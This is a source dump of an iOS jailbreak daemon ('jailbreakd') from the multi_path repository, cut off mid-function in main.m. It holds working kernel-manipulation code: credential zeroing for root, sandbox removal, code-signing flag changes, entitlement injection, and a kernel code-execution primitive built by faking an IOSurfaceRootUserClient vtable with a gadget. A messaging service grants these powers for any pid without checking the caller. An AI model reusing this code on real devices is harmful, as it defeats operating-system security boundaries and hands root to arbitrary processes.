--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-w:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-w
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-w-am:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-w-am
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-w-nam:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-w-nam
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-w-nav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-w-nav
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100nam:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100nam
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/78/xterm-256color:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/78/xterm-256color
--------------------------------------------------------------------------------
/multi_path/jailbreakd/Makefile:
--------------------------------------------------------------------------------
# Theos build for the jailbreakd command-line tool (setup steps are in README.md).
include $(THEOS)/makefiles/common.mk

# 64-bit only: every offset in offsetof.c is an arm64 kernel layout.
ARCHS = arm64

TOOL_NAME = jailbreakd
# Every .m and .c file in this directory is compiled into the tool.
jailbreakd_FILES = $(wildcard *.m) $(wildcard *.c)
# NOTE(review): this silences every compiler warning, including the ones that
# would point at real mistakes in main.m (e.g. the const-qualifier loss on
# `ent`). Consider narrowing it to the specific -Wno-* flags actually needed.
CFLAGS += -Wno-everything
# IOKit: IOSurfaceRoot user client used by kexecute.m.
# AppSupport: CPDistributedMessagingCenter used by main.m.
jailbreakd_PRIVATE_FRAMEWORKS = IOKit AppSupport
include $(THEOS_MAKE_PATH)/tool.mk
10 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/README.md:
--------------------------------------------------------------------------------
1 | # rootless jailbreakd
2 |
3 | A small jailbreakd offering some more functionality to the jailbreak. It uses CPDistributedMessagingCenter. To compile you need theos (why? cus why not? and I like theos. If you're smart enough you can still compile it manually very easily, so yeah).
4 |
5 | # Setup
6 |
7 | - Grab AppSupport headers and add them into your include path (https://github.com/theos/headers/tree/05405174749d912f7726121fcb5f27de73af0f08/AppSupport)
8 | - Include "AppSupport/CPDistributedMessagingCenter.h" on your main.m file
9 | - Link with https://github.com/jakeajames/rootme-tutorial/blob/master/AppSupport.tbd
10 | - The general syntax follows as this:
11 | ```
12 | CPDistributedMessagingCenter *messageCenter = [CPDistributedMessagingCenter centerNamed:@"com.jakeashacks.jbclient"]; // must match the name main.m registers with centerNamed:
13 | [messageCenter sendMessageAndReceiveReplyName:@"MESSAGE_NAME" userInfo:[NSDictionary dictionaryWithObject:[NSString stringWithFormat:@"%d", getpid()] forKey:@"pid"]];
14 | ```
15 | # Compiling
16 | ./make.sh
17 | # Commands
18 |
19 | At the moment these commands are available
20 |
21 | - "rootme": does setuid(0) and setgid(0) for you
22 | - "unsandbox": gets rid of most of the sandbox (not useful right now, since you already have to be unsandboxed to call jailbreakd)
23 | - "platformize": marks your binary as platform by setting TF_PLATFORM and CS_PLATFORM_BINARY
24 | - "setcsflags": Sets some flags such as CS_PLATFORM_BINARY, CS_GET_TASK_ALLOW, CS_DEBUGGED etc
25 | - "entitle": Set entitlement to true or false. Example:
26 | ```
27 | CPDistributedMessagingCenter *messageCenter = [CPDistributedMessagingCenter centerNamed:@"com.jakeashacks.jbclient"]; // must match the name main.m registers with centerNamed:
28 | NSMutableDictionary *dict = [NSMutableDictionary dictionary];
29 | [dict setValue:@"com.apple.private.skip-library.validation" forKey:@"ent"]; //entitlement name
30 | [dict setValue:@"true" forKey:@"value"]; //true or false
31 | [dict setValue:[NSString stringWithFormat:@"%d", getpid()] forKey:@"pid"];
32 | [messageCenter sendMessageAndReceiveReplyName:@"entitle" userInfo:dict];
33 | ```
34 |
35 | # Do binaries need suid permissions or root ownership?
36 |
37 | No. I didn't bother with that because a) there isn't a package manager, so all binaries are controlled by you; b) there's no root remount, so nothing can cause a big mess; c) you need to be unsandboxed to make a call to jailbreakd (all binaries you run via SSH satisfy this requirement), and that's enough for me. Be aware that jailbreakd itself performs no check on the caller: the `pid` in the message is supplied by the client, not derived from the sender, so any unsandboxed process that can reach the messaging center can request root, sandbox removal, platform status or entitlements for any pid. Is it coming? Probably yes
38 |
39 | # Coming soon
40 |
41 | - I guess a nice response from jailbreakd telling us what happened in the other world
42 | - (?) check for suid permissions and ownership
43 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/ent.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | platform-application
6 |
7 | get-task-allow
8 |
9 | com.apple.system-task-ports
10 |
11 | task_for_pid-allow
12 |
13 | com.apple.private.memorystatus
14 |
15 | com.apple.private.security.container-required
16 |
17 |
18 |
19 |
20 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/jailbreakd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/jailbreakd/jailbreakd
--------------------------------------------------------------------------------
/multi_path/jailbreakd/jelbrek.h:
--------------------------------------------------------------------------------
1 |
// Public API of the jailbreakd kernel-patching helpers (implemented in jelbrek.m).
// Every function below writes directly into kernel memory through tfp0, so
// init_jelbrek() must run first. The pid argument is always the process to
// modify, never the caller.
void init_jelbrek(mach_port_t tfp0, uint64_t kernel_base);
// Zero the sandbox slot hanging off the target's credential label; YES if it reads back as 0.
BOOL unsandbox(pid_t pid);
// Set CS_PLATFORM_BINARY|CS_INSTALLER|CS_GET_TASK_ALLOW|CS_DEBUGGED and clear CS_RESTRICT|CS_HARD|CS_KILL in p_csflags.
void setcsflags(pid_t pid);
// Zero the uid/gid fields of the target's proc and ucred; returns whether root was obtained.
BOOL get_root(pid_t pid);
// Set TF_PLATFORM (0x400) on the target's task and OR platform bits into p_csflags.
void platformize(pid_t pid);
// Add entitlement `ent1` = val1 to the target's entitlement dictionary; only keys
// that are absent are added. jelbrek.m spells the last parameter `_Bool`; on
// arm64 BOOL is expected to be the same type — confirm if the build complains.
void entitlePid(pid_t pid, const char *ent1, BOOL val1);
8 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/jelbrek.m:
--------------------------------------------------------------------------------
1 | #import
2 | #include
3 | #include "kern_utils.h"
4 | #include "patchfinder64.h"
5 | #include "offsetof.h"
6 | #include "jelbrek.h"
7 | #include
8 | #include "kexecute.h"
9 |
10 |
// Bind the kernel read/write primitives to tfp0, then hand kernel_base to
// patchfinder64. Order presumably matters: init_kernel() is expected to read
// the kernel image through the primitives set up by init_kernel_utils() —
// confirm in patchfinder64 before reordering.
void init_jelbrek(mach_port_t tfp0, uint64_t kernel_base) {
    init_kernel_utils(tfp0);
    init_kernel(kernel_base, NULL);
}
15 |
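// Remove the sandbox from `pid` by zeroing one slot in its credential.
//
// Path walked (hard-coded for the targeted kernel build):
//   proc->p_ucred          (offsetof_p_ucred)
//   ucred + 0x78           -> appears to be the credential's MAC label: +0x8 is
//                             used as the entitlement dictionary in entitlePid()
//                             and +0x10 as the sandbox slot here — confirm
//                             against the kernel's struct ucred/label
//   label + 0x8 + 0x8      -> sandbox per-credential slot; 0 = no sandbox
//
// Returns YES when the slot reads back as 0 afterwards. Returns NO, without
// touching kernel memory, when no proc is found for `pid` (assumes
// proc_for_pid() returns 0 on a miss — confirm in kern_utils; without the guard
// we would kwrite64 relative to a NULL proc).
BOOL unsandbox(pid_t pid) {
    uint64_t proc = proc_for_pid(pid);
    if (proc == 0) {
        NSLog(@"[-] unsandbox: no proc found for pid %d\n", pid);
        return NO;
    }
    uint64_t ucred = kread64(proc + offsetof_p_ucred); //our credentials
    uint64_t sandbox_slot = kread64(ucred + 0x78) + 8 + 8;
    kwrite64(sandbox_slot, 0x0); //get rid of sandbox by writing 0x0 to it

    return (kread64(sandbox_slot) == 0) ? YES : NO;
}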
23 |
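// Loosen code-signing enforcement on `pid` by editing proc->p_csflags in place:
//   set   CS_PLATFORM_BINARY | CS_INSTALLER | CS_GET_TASK_ALLOW | CS_DEBUGGED
//   clear CS_RESTRICT | CS_HARD | CS_KILL
// All other bits are preserved. Does nothing (beyond a log line) when no proc
// is found for `pid` (assumes proc_for_pid() returns 0 on a miss — confirm in
// kern_utils).
void setcsflags(pid_t pid) {
    uint64_t proc = proc_for_pid(pid);
    if (proc == 0) {
        NSLog(@"[-] setcsflags: no proc found for pid %d\n", pid);
        return;
    }
    uint32_t csflags = kread32(proc + offsetof_p_csflags);
    csflags |= CS_PLATFORM_BINARY | CS_INSTALLER | CS_GET_TASK_ALLOW | CS_DEBUGGED;
    csflags &= ~(CS_RESTRICT | CS_HARD | CS_KILL);
    kwrite32(proc + offsetof_p_csflags, csflags);
}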
30 |
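// Mark `pid` as a platform process:
//   1. set TF_PLATFORM (0x400) in task->t_flags;
//   2. OR 0x24004001 into proc->p_csflags.
// 0x24004001 decodes to CS_VALID (0x1) | CS_ENTITLEMENTS_VALIDATED (0x4000)
// | 0x04000000 | 0x20000000; the last two correspond to XNU's
// CS_PLATFORM_BINARY and CS_SIGNED values — confirm against offsetof.h.
// Does nothing (beyond a log line) when no proc is found for `pid` (assumes
// proc_for_pid() returns 0 on a miss — confirm in kern_utils).
void platformize(pid_t pid) {
    uint64_t proc = proc_for_pid(pid);
    if (proc == 0) {
        NSLog(@"[-] platformize: no proc found for pid %d\n", pid);
        return;
    }
    NSLog(@"Platformizing process at address 0x%llx\n", proc);

    // task flags
    uint64_t task = kread64(proc + offsetof_task);
    uint32_t t_flags = kread32(task + offsetof_t_flags);
    t_flags |= 0x400; // TF_PLATFORM
    NSLog(@"Flicking on task @0x%llx t->flags to have TF_PLATFORM (0x%x)..\n", task, t_flags);
    kwrite32(task + offsetof_t_flags, t_flags);

    // code-signing flags
    uint32_t csflags = kread32(proc + offsetof_p_csflags);
    kwrite32(proc + offsetof_p_csflags, csflags | 0x24004001u);
}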
42 |
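// Give `pid` uid/gid 0 by writing straight into its proc and ucred, bypassing
// setuid()/setgid() and any policy check on them.
//
// Writes, in order: proc p_uid/p_ruid/p_gid/p_rgid, then ucred cr_uid/cr_ruid/
// cr_svuid, cr_ngroups = 1 with cr_groups[0] = 0 (XNU keeps the effective gid
// in cr_groups[0] — confirm), cr_rgid and cr_svgid.
//
// Returns YES when the *target's* cr_uid reads back as 0. The previous version
// returned geteuid() == 0, i.e. the daemon's own effective uid, which says
// nothing about whether the writes to the target took effect.
// Returns NO, without touching kernel memory, when no proc is found for `pid`
// (assumes proc_for_pid() returns 0 on a miss — confirm in kern_utils).
BOOL get_root(pid_t pid) {
    uint64_t proc = proc_for_pid(pid);
    if (proc == 0) {
        NSLog(@"[-] get_root: no proc found for pid %d\n", pid);
        return NO;
    }
    uint64_t ucred = kread64(proc + offsetof_p_ucred);

    //make everything 0 without setuid(0), pretty straightforward.
    // proc-level ids
    kwrite32(proc + offsetof_p_uid, 0);
    kwrite32(proc + offsetof_p_ruid, 0);
    kwrite32(proc + offsetof_p_gid, 0);
    kwrite32(proc + offsetof_p_rgid, 0);
    // credential ids
    kwrite32(ucred + offsetof_ucred_cr_uid, 0);
    kwrite32(ucred + offsetof_ucred_cr_ruid, 0);
    kwrite32(ucred + offsetof_ucred_cr_svuid, 0);
    kwrite32(ucred + offsetof_ucred_cr_ngroups, 1);
    kwrite32(ucred + offsetof_ucred_cr_groups, 0); // cr_groups[0]
    kwrite32(ucred + offsetof_ucred_cr_rgid, 0);
    kwrite32(ucred + offsetof_ucred_cr_svgid, 0);

    // Verify against the target's credential, not this process.
    return (kread32(ucred + offsetof_ucred_cr_uid) == 0) ? YES : NO;
}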
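// Add the entitlement `ent1` with boolean value val1 to `pid`'s entitlement
// dictionary (an OSDictionary living in kernel memory).
//
// Path walked: proc->p_ucred (offsetof_p_ucred) -> +0x78 (credential label)
// -> +0x8 (entitlement OSDictionary; same label base that unsandbox() uses
// for the sandbox slot). The previous version hard-coded proc+0x100 for
// p_ucred; it now uses the shared offsetof_p_ucred so an offset change only
// has to be made in offsetof.c.
//
// Only *absent* keys are added: if the dictionary already holds `ent1` nothing
// is written, so this cannot flip an existing true to false (or vice versa).
// Does nothing when `ent1` is NULL or when no proc is found for `pid`
// (assumes proc_for_pid() returns 0 on a miss — confirm in kern_utils).
void entitlePid(pid_t pid, const char *ent1, _Bool val1) {
    if (ent1 == NULL) {
        NSLog(@"[-] entitlePid: no entitlement name given for pid %d\n", pid);
        return;
    }
    uint64_t proc = proc_for_pid(pid);
    if (proc == 0) {
        NSLog(@"[-] entitlePid: no proc found for pid %d\n", pid);
        return;
    }
    uint64_t ucred = kread64(proc + offsetof_p_ucred);
    uint64_t entitlements = kread64(kread64(ucred + 0x78) + 0x8);

    uint64_t current = OSDictionary_GetItem(entitlements, ent1);
    if (current != 0) {
        // Already present: left untouched (see note above).
        return;
    }

    usleep(1000);
    NSLog(@"[*] Setting Entitlements...");
    NSLog(@"before: %s is 0x%llx", ent1, current);
    usleep(1000);
    uint64_t value = val1 ? find_OSBoolean_True() : find_OSBoolean_False();
    OSDictionary_SetItem(entitlements, ent1, value);
    usleep(1000);
    NSLog(@"after: %s is 0x%llx", ent1, OSDictionary_GetItem(entitlements, ent1));
}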
78 |
79 |
80 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/kern_utils.h:
--------------------------------------------------------------------------------
1 | //
2 | // fun_utils.h
3 | // async_wake_ios
4 | //
5 | // Created by George on 18/12/17.
6 | // Copyright © 2017 Ian Beer. All rights reserved.
7 | //
8 |
9 | #ifndef fun_utils_h
10 | #define fun_utils_h
11 |
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 | #include
20 | #include
21 | #include
22 |
23 | // Needed definitions
24 | kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags);
25 | kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize);
26 | kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);
27 | kern_return_t mach_vm_deallocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size);
28 |
29 | // "General" purpose
30 | uint8_t *get_sha256(uint8_t* code_dir);
31 | uint8_t *get_code_directory(const char* name);
32 | int cp(const char *from, const char *to);
33 | int file_exist(char *filename);
34 |
35 | // Kernel utility stuff
36 | void init_kernel_utils(mach_port_t tfp0);
37 | uint64_t kalloc(vm_size_t size);
38 | void kfree(mach_vm_address_t address, vm_size_t size);
39 | size_t kread(uint64_t where, void *p, size_t size);
40 | uint32_t kread32(uint64_t where);
41 | uint64_t kread64(uint64_t where);
42 | size_t kwrite(uint64_t where, const void *p, size_t size);
43 | void kwrite32(uint64_t where, uint32_t what);
44 | void kwrite64(uint64_t where, uint64_t what);
45 | void kmemcpy(uint64_t dest, uint64_t src, uint32_t length);
46 | mach_port_t fake_host_priv(void);
47 | uint64_t zm_fix_addr(uint64_t addr);
48 | uint64_t proc_for_pid(pid_t pid);
49 | uint64_t proc_for_name(char *nm);
50 | unsigned int pid_for_name(char *nm);
51 | uint64_t find_port_address(mach_port_name_t port);
52 | uint64_t task_self_addr(void);
53 | uint64_t kmem_alloc_wired(uint64_t size);
54 | #endif /* fun_utils_h */
55 |
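// Logging switch. With DEBUG_LOG defined (the default) NSLog is left alone and
// output goes to the system log. Comment the #define out to route every NSLog
// in this tool to stdout instead.
//
// The previous replacement macro could not compile when enabled: it used the
// (void) result of NSLog as an operand of &&, handed an NSString format to
// fprintf (so %@ and other Foundation specifiers would be misread), and left a
// dangling comma when NSLog was called with no extra arguments.
// stringWithFormat: handles the NSString format and ##__VA_ARGS__ absorbs the
// zero-argument case.
//
// NOTE(review): several call sites log raw kernel addresses (proc, task, port,
// vtable). Whichever sink is chosen, consider whether exposing the kernel
// layout to everything on the device that can read that sink is acceptable.
#define DEBUG_LOG // comment this line out if you don't want the log to go to the system log (/var/log); it goes to stdout instead
#ifndef DEBUG_LOG
#define NSLog(fmt, ...) fprintf(stdout, "%s\n", [[NSString stringWithFormat:(fmt), ##__VA_ARGS__] UTF8String])
#endif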
60 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/kexecute.h:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
// Call kernel function `addr` with up to seven 64-bit arguments and return its
// 64-bit result. x0 becomes the callee's first argument (it is the object slot
// of the faked IOExternalTrap, see kexecute.m); x1..x6 travel through
// IOConnectTrap6. Only valid between init_kexecute() and term_kexecute().
uint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6);
// Build the fake IOSurfaceRootUserClient + vtable pair that kexecute() traps through.
void init_kexecute(void);
// Point the user-client port back at the real object and free the fake copies.
void term_kexecute(void);
7 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/kexecute.m:
--------------------------------------------------------------------------------
1 |
2 | #include
3 | #include "kern_utils.h"
4 | #include "kexecute.h"
5 | #include "patchfinder64.h"
6 | #include "offsetof.h"
7 | #include
8 |
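// Open a connection to the IOSurfaceRoot service and return the user-client
// port. That port is what kexecute() later traps through; its kernel-side
// object is what init_kexecute() swaps for a fake one.
//
// Failure to find or open the service is fatal: nothing else in the daemon
// works without kexecute, so we exit rather than continue half-initialised.
// The service lookup handle is released once the connection exists — the
// previous version never released it.
mach_port_t prepare_user_client(void) {
    io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"));
    if (service == IO_OBJECT_NULL) {
        NSLog(@" [-] unable to find service\n");
        exit(EXIT_FAILURE);
    }

    mach_port_t user_client = MACH_PORT_NULL;
    kern_return_t err = IOServiceOpen(service, mach_task_self(), 0, &user_client);
    IOObjectRelease(service); // lookup handle is not needed once the connection is open
    if (err != KERN_SUCCESS) {
        NSLog(@" [-] unable to get user client connection\n");
        exit(EXIT_FAILURE);
    }

    NSLog(@"got user client: 0x%x\n", user_client);
    return user_client;
}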
30 |
// Serialises kexecute() callers.
// TODO: Consider removing this - jailbreakd runs all kernel ops on the main thread
pthread_mutex_t kexecute_lock;
static mach_port_t user_client;               // connection port from prepare_user_client()
static uint64_t IOSurfaceRootUserClient_port; // kernel address of that port's ipc_port
static uint64_t IOSurfaceRootUserClient_addr; // kernel address of the real IOSurfaceRootUserClient object
static uint64_t fake_vtable;                  // kalloc'd copy of the real vtable, slot 0xB7 patched
static uint64_t fake_client;                  // kalloc'd copy of the real client, pointing at fake_vtable
const int fake_kalloc_size = 0x1000;          // size of each copy; equals the 0x200 * 8 bytes copied in init_kexecute()
39 |
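// Turn our IOSurfaceRootUserClient into a kernel-code-execution primitive
// (technique from v0rtex / async_wake):
//
//   1. resolve the port's kernel ipc_port and, via ip_kobject, the real
//      IOSurfaceRootUserClient C++ object and its vtable;
//   2. kalloc two 0x1000-byte buffers and copy the vtable and the object into
//      them (0x200 * 8 bytes each — exactly fake_kalloc_size);
//   3. replace vtable slot 0xB7 (IOUserClient::getExternalTrapForIndex) in the
//      copy with an `add x0, x0, #0x40; ret` gadget, so the kernel reads the
//      IOExternalTrap {object, func} from fake_client+0x40 — the two words
//      kexecute() fills in per call;
//   4. point the fake object at the fake vtable and the port's ip_kobject at
//      the fake object, so every trap on our port now dispatches through
//      memory we control.
//
// The gadget address is resolved and checked *before* any kernel state is
// modified: the previous version wrote whatever find_add_x0_x0_0x40_ret()
// returned into the vtable, and a 0 there turns the next IOConnectTrap6 into a
// kernel NULL-pointer call. kalloc results are checked for the same reason
// (assumes kalloc() returns 0 on failure — confirm in kern_utils). Failures
// are fatal, matching prepare_user_client().
void init_kexecute(void) {
    uint64_t gadget = find_add_x0_x0_0x40_ret();
    if (gadget == 0) {
        NSLog(@" [-] could not find the add x0, x0, #0x40; ret gadget\n");
        exit(EXIT_FAILURE);
    }

    user_client = prepare_user_client();

    // From v0rtex - UserClients are just mach ports; resolve ours to its kernel ipc_port...
    IOSurfaceRootUserClient_port = find_port_address(user_client);
    NSLog(@"Found port: 0x%llx\n", IOSurfaceRootUserClient_port);

    // ...the C++ object hangs off ip_kobject...
    IOSurfaceRootUserClient_addr = kread64(IOSurfaceRootUserClient_port + offsetof_ip_kobject);
    NSLog(@"Found addr: 0x%llx\n", IOSurfaceRootUserClient_addr);

    // ...and its vtable is the first word of the object.
    uint64_t IOSurfaceRootUserClient_vtab = kread64(IOSurfaceRootUserClient_addr);
    NSLog(@"Found vtab: 0x%llx\n", IOSurfaceRootUserClient_vtab);

    // Both copies live in kalloc memory we can edit freely.
    fake_vtable = kalloc(fake_kalloc_size);
    fake_client = kalloc(fake_kalloc_size);
    if (fake_vtable == 0 || fake_client == 0) {
        NSLog(@" [-] kalloc failed (vtable 0x%llx, client 0x%llx)\n", fake_vtable, fake_client);
        exit(EXIT_FAILURE);
    }
    NSLog(@"Created fake_vtable at %016llx\n", fake_vtable);
    NSLog(@"Created fake_client at %016llx\n", fake_client);

    for (int i = 0; i < 0x200; i++) {
        kwrite64(fake_vtable + i * 8, kread64(IOSurfaceRootUserClient_vtab + i * 8));
    }
    NSLog(@"Copied some of the vtable over\n");

    for (int i = 0; i < 0x200; i++) {
        kwrite64(fake_client + i * 8, kread64(IOSurfaceRootUserClient_addr + i * 8));
    }
    NSLog(@"Copied the user client over\n");

    // Patch the trap lookup in the copy first, then wire the copies in:
    // fake_client -> fake_vtable, then port -> fake_client.
    kwrite64(fake_vtable + 8 * 0xB7, gadget);
    kwrite64(fake_client, fake_vtable);
    kwrite64(IOSurfaceRootUserClient_port + offsetof_ip_kobject, fake_client);
    NSLog(@"Wrote the `add x0, x0, #0x40; ret;` gadget over getExternalTrapForIndex");

    pthread_mutex_init(&kexecute_lock, NULL);
}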
100 |
// Undo init_kexecute(): point the port's ip_kobject back at the real
// IOSurfaceRootUserClient first, then free the two kalloc'd copies. The order
// matters — freeing before the swap-back would leave a live port referring to
// freed kernel memory.
void term_kexecute(void) {
    kwrite64(IOSurfaceRootUserClient_port + offsetof_ip_kobject, IOSurfaceRootUserClient_addr);
    kfree(fake_vtable, fake_kalloc_size);
    kfree(fake_client, fake_kalloc_size);
}
106 |
// Call kernel function `addr` as addr(x0, x1, ..., x6) and return its result.
//
// Mechanism: IOConnectTrap6 -> iokit_user_client_trap ->
// IOUserClient::getTargetAndTrapForIndex -> our patched vtable slot, the gadget
// `add x0, x0, #0x40; ret`, which hands the kernel fake_client+0x40 as the
// IOExternalTrap. That struct is {object, func}: the kernel calls
// func(object, x1..x6), so the word at +0x40 becomes the callee's first
// argument and the word at +0x48 the callee itself. Both words are restored
// afterwards so the fake client looks untouched between calls.
//
// Holds kexecute_lock for the duration. The lock is created by
// init_kexecute(), so calling this before it is undefined.
uint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6) {
    const uint64_t trap_object = fake_client + 0x40;
    const uint64_t trap_func   = fake_client + 0x48;

    pthread_mutex_lock(&kexecute_lock);

    // Save whatever currently occupies the trap slots...
    uint64_t saved_object = kread64(trap_object);
    uint64_t saved_func   = kread64(trap_func);

    // ...install this call and fire it...
    kwrite64(trap_object, x0);
    kwrite64(trap_func, addr);
    uint64_t result = IOConnectTrap6(user_client, 0, x1, x2, x3, x4, x5, x6);

    // ...and put the originals back.
    kwrite64(trap_object, saved_object);
    kwrite64(trap_func, saved_func);

    pthread_mutex_unlock(&kexecute_lock);

    return result;
}
132 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/main.m:
--------------------------------------------------------------------------------
1 | #import
2 | #include
3 | #include "kern_utils.h"
4 | #include "patchfinder64.h"
5 | #include "jelbrek.h"
6 | #include
7 | #include "offsets.h"
8 |
9 | mach_port_t tfp0;
10 | uint64_t kernel_base;
11 | uint64_t kernel_slide;
12 | int pid;
13 |
14 |
// Receiver for the CPDistributedMessagingCenter messages jailbreakd serves.
// Each handler reads the target pid from userInfo[@"pid"] (a decimal string)
// and applies the matching kernel patch from jelbrek.m to that pid. The pid is
// whatever the client sent — it is not derived from the sender.
@interface Listener : NSObject
- (NSDictionary *)rootme:(NSString *)name message:(NSDictionary *)userInfo;      // get_root(pid)
- (NSDictionary *)unsandbox:(NSString *)name message:(NSDictionary *)userInfo;   // unsandbox(pid)
- (NSDictionary *)platformize:(NSString *)name message:(NSDictionary *)userInfo; // platformize(pid)
- (NSDictionary *)entitle:(NSString *)name message:(NSDictionary *)userInfo;     // entitlePid(pid, userInfo[@"ent"], userInfo[@"value"] is "true"/"false")
- (NSDictionary *)setcsflags:(NSString *)name message:(NSDictionary *)userInfo;  // setcsflags(pid)
-(id)init; // registers the handlers above and runs the run loop; does not return while serving
@end
23 |
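// Parse the client-supplied target pid out of a message.
//
// Returns -1 when the "pid" entry is missing, not a string, not a plain decimal
// number, or not a positive value that fits a pid_t. pid 0 is the kernel and
// negative pids are never valid targets. The previous code did
// atoi([... UTF8String]) with no checks, so a message without "pid" ended in
// atoi(NULL) and a non-numeric string silently became pid 0.
static pid_t target_pid_from_message(NSDictionary *userInfo) {
    id raw = [userInfo objectForKey:@"pid"];
    if (![raw isKindOfClass:[NSString class]]) {
        return -1;
    }
    const char *text = [(NSString *)raw UTF8String];
    if (text == NULL || *text == '\0') {
        return -1;
    }
    char *end = NULL;
    long value = strtol(text, &end, 10);
    if (*end != '\0' || value <= 0 || (long)(pid_t)value != value) {
        return -1;
    }
    return (pid_t)value;
}

// Message receiver for jailbreakd. Every handler patches the process named by
// the message's "pid" field; see the @interface for the mapping.
//
// NOTE(review): there is no check on *who* is asking. The pid comes from the
// message, not from the sending connection, so any process that can reach the
// "com.jakeashacks.jbclient" center can request root, sandbox removal,
// platform status or arbitrary entitlements for any pid. The README relies on
// callers already having to be unsandboxed to reach the center at all.
@implementation Listener

// Register every handler on the messaging center and run the run loop.
// CFRunLoopRun() only returns if the loop is stopped, so in normal operation
// this method never returns; `self` is returned to honour the init contract
// (the previous version fell off the end of a non-void method and never
// called [super init]).
-(id)init {
    self = [super init];
    if (self == nil) {
        return nil;
    }

    NSLog(@"Listening...");

    //CPDistributedMessagingCenter is a great way to send messages between processes, without advanced knowledge at all. Why bother with Electra's way when the system offers APIs to handle all the messages?
    CPDistributedMessagingCenter *messagingCenter = [CPDistributedMessagingCenter centerNamed:@"com.jakeashacks.jbclient"];
    [messagingCenter runServerOnCurrentThread];
    [messagingCenter registerForMessageName:@"rootme" target:self selector:@selector(rootme:message:)];
    [messagingCenter registerForMessageName:@"unsandbox" target:self selector:@selector(unsandbox:message:)];
    [messagingCenter registerForMessageName:@"platformize" target:self selector:@selector(platformize:message:)];
    [messagingCenter registerForMessageName:@"entitle" target:self selector:@selector(entitle:message:)];
    [messagingCenter registerForMessageName:@"setcsflags" target:self selector:@selector(setcsflags:message:)];

    CFRunLoopRun(); //this ensures that the binary will keep running
    return self;
}

// Shared preamble for every handler: validate the target pid, mirror it into
// the file-level `pid` global (kept for compatibility) and log it.
// Returns -1, after an error line on stderr, when the message had no usable pid.
- (pid_t)targetPidFromMessage:(NSDictionary *)userInfo {
    pid_t target = target_pid_from_message(userInfo);
    if (target < 0) {
        fprintf(stderr, "Error, request without a valid pid\n");
        return -1;
    }
    pid = target;
    NSLog(@"[*] Got request from pid %d\n", target); // "from" here means the pid named in the request
    return target;
}

- (NSDictionary *)rootme:(NSString *)name message:(NSDictionary *)userInfo {
    pid_t target = [self targetPidFromMessage:userInfo];
    if (target < 0) {
        return nil;
    }
    get_root(target);
    return nil;
}

- (NSDictionary *)unsandbox:(NSString *)name message:(NSDictionary *)userInfo {
    pid_t target = [self targetPidFromMessage:userInfo];
    if (target < 0) {
        return nil;
    }
    unsandbox(target);
    return nil;
}

- (NSDictionary *)platformize:(NSString *)name message:(NSDictionary *)userInfo {
    pid_t target = [self targetPidFromMessage:userInfo];
    if (target < 0) {
        return nil;
    }
    platformize(target);
    return nil;
}

// userInfo must also carry "ent" (entitlement key, non-empty string) and
// "value" ("true" or "false"). Anything else is rejected before touching the
// kernel; the previous version passed a NULL entitlement name straight into
// entitlePid() when "ent" was missing.
- (NSDictionary *)entitle:(NSString *)name message:(NSDictionary *)userInfo {
    pid_t target = [self targetPidFromMessage:userInfo];
    if (target < 0) {
        return nil;
    }

    id entName = [userInfo objectForKey:@"ent"];
    if (![entName isKindOfClass:[NSString class]] || [(NSString *)entName length] == 0) {
        fprintf(stderr, "Error, entitlement name missing\n");
        return nil;
    }

    id val = [userInfo objectForKey:@"value"];
    BOOL valb;
    if ([val isKindOfClass:[NSString class]] && [(NSString *)val isEqualToString:@"true"]) {
        valb = YES;
    } else if ([val isKindOfClass:[NSString class]] && [(NSString *)val isEqualToString:@"false"]) {
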